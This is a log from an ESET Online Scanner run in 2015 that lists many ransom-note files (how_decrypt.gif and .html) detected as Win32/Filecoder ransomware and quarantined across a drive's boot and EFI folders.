# local_time=2015-09-06 10:13:44 (+1000, AUS Eastern Standard Time)
# country="Australia"
# osver=6.2.9200 NT 
[email protected] as downloader log:
all ok
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# EOSSerial=9b95a216f1e7ab4aa0efb9290f3ec81f
# end=init
# utc_time=2015-09-06 12:27:53
# local_time=2015-09-06 10:27:53 (+1000, AUS Eastern Standard Time)
# country="Australia"
# osver=6.2.9200 NT 
Update Init
Update Download
Update Finalize
Updated modules version: 25622
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# EOSSerial=9b95a216f1e7ab4aa0efb9290f3ec81f
# end=updated
# utc_time=2015-09-06 12:30:43
# local_time=2015-09-06 10:30:43 (+1000, AUS Eastern Standard Time)
# country="Australia"
# osver=6.2.9200 NT 
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# OnlineScanner.ocx=1.0.0.7777
# api_version=3.1.1
# EOSSerial=9b95a216f1e7ab4aa0efb9290f3ec81f
# engine=25622
# end=finished
# remove_checked=true
# archives_checked=false
# unwanted_checked=true
# unsafe_checked=false
# antistealth_checked=true
# utc_time=2015-09-06 01:40:42
# local_time=2015-09-06 11:40:42 (+1000, AUS Eastern Standard Time)
# country="Australia"
# lang=1033
# osver=6.2.9200 NT 
# compatibility_mode_1='Panda Free Antivirus'
# compatibility_mode=1557 16777213 87 100 463100 227703216 0 0
# compatibility_mode_1=''
# compatibility_mode=5893 16776574 100 94 32329 14790007 0 0
# scanned=214727
# found=207
# cleaned=207
# scan_time=4198
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\nl-nl\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\pl-pl\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\pl-pl\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\pt-br\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\pt-br\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\pt-pt\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\pt-pt\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\ro-ro\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\ro-ro\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\ru-ru\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\ru-ru\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\sk-sk\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\sk-sk\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\sl-si\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\sl-si\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\sr-latn-rs\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\sr-latn-rs\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\sv-se\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\sv-se\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\tr-tr\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\tr-tr\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\uk-ua\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\uk-ua\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\zh-cn\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\zh-cn\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\zh-hk\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\zh-hk\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\zh-tw\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\zh-tw\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\bg-bg\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\bg-bg\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\cs-cz\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\cs-cz\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\da-dk\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\da-dk\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\de-de\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\de-de\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\el-gr\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\el-gr\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\en-gb\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\en-gb\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\en-us\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\en-us\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\es-es\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\es-es\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\et-ee\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\et-ee\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\fi-fi\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\fi-fi\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\fr-fr\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\fr-fr\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\hr-hr\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\hr-hr\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\hu-hu\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\hu-hu\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\it-it\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\it-it\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\ja-jp\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\ja-jp\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\ko-kr\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\ko-kr\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\lt-lt\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\lt-lt\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\lv-lv\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\lv-lv\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\nb-no\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\nb-no\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\nl-nl\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\nl-nl\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\pl-pl\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\pl-pl\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\pt-br\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\pt-br\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\pt-pt\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\pt-pt\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\ro-ro\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\ro-ro\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\ru-ru\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\ru-ru\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\sk-sk\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\sk-sk\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\sl-si\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\sl-si\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\sr-latn-rs\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\sr-latn-rs\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\sv-se\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\sv-se\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\tr-tr\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\tr-tr\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\uk-ua\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\uk-ua\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\zh-cn\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\zh-cn\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\zh-hk\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\zh-hk\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\zh-tw\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\zh-tw\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\cs-cz\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\cs-cz\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\da-dk\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\da-dk\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\de-de\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\de-de\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\el-gr\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\el-gr\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\en-us\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\en-us\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\es-es\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\es-es\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\fi-fi\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\fi-fi\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\Fonts\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\Fonts\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\fr-fr\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\fr-fr\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\hu-hu\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\hu-hu\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\it-it\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\it-it\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\ja-jp\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\ja-jp\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\ko-kr\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\ko-kr\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\nb-no\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\nb-no\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\nl-nl\how_decrypt.gif"
